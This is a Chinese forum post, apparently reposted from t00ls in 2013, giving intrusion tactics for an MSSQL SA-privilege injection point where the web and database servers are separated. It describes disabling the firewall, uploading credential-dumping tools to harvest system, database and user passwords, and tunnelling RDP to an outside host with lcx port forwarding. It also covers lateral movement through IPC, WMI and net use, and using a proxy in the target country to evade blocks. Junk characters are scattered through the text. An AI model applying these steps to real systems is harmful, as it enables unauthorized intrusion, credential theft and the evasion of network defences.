当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
- h7 B4 K, X/ ]1 ]2 g$ X
2 M/ i* k: |, ]. W
0 _ {* j7 q5 e0 M$ ^% X
$ t5 w! o" Z. `- [" zSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
* }6 {( I- h& |% p9 q1 f7 @
6 U+ M5 r; C; B* y) c1 U/ x) i l, N0 U" }0 M' n/ S
一、DB机有公网IP.
7 v6 g# T) v! k" g6 ]( }9 u# y; c1 K7 P6 V7 e: b& f
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接., a8 T& k9 i8 A* o9 a
8 z6 E2 H- B2 }) }" t1 e
/ g) x3 F, V; O$ q' w; p' {2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
k# a3 D y! l( y. M4 ^* j3 b8 t/ f( ?& H
i9 [, ^8 ^3 C' ~9 G3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com0 w4 N1 x, b. N Z1 P2 ?7 G( f) h
' V3 c% Y" L4 f3 z5 B6 G( X6 q- g- ]2 r4 K3 d/ f7 Q5 J+ |
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.% ~7 [0 @' F& E6 }2 B4 A d1 s
: d) }$ v0 A8 W4 y; e
7 E1 r+ V; l4 C- c! E
0 |# |. m ]/ ]8 [2 f9 F二、DB机只有内网IP% B0 b5 x7 v7 n+ e+ q. }
7 K2 B* Q9 h: f# r. F& Z n6 |1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
/ X) _( O7 q; w& f0 D5 H/ z, X- Q0 J/ z, r2 `+ L+ k1 I0 l1 \# ^% w
. k+ h; }0 ]: B; ?0 @
2:停掉防火墙和IP策略再从内往外扫描.
8 U8 M u- b1 m) ?9 }6 ^2 f/ |# L* N% J& } ^: L% P( l1 l
) N! ?* l4 R2 L* b3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.9 o5 o7 {5 ^/ [8 C/ @, Q, C
9 [7 m( U" }6 @: H9 s" e) L6 A2 ?7 C# V0 O0 j) T# A" a7 a0 T/ M
4:学会密码规律分析往往会有惊喜.
7 O! _0 ?# t9 v, R5 C9 V6 c! P [; a4 x
# [$ X' Q+ B5 ~. O. X
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
. s- j) ]7 ]% |, _8 |) o( s. x% J5 M5 S- K2 C3 U' p
7 D% Z" I2 ~0 o& p3 }! C
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对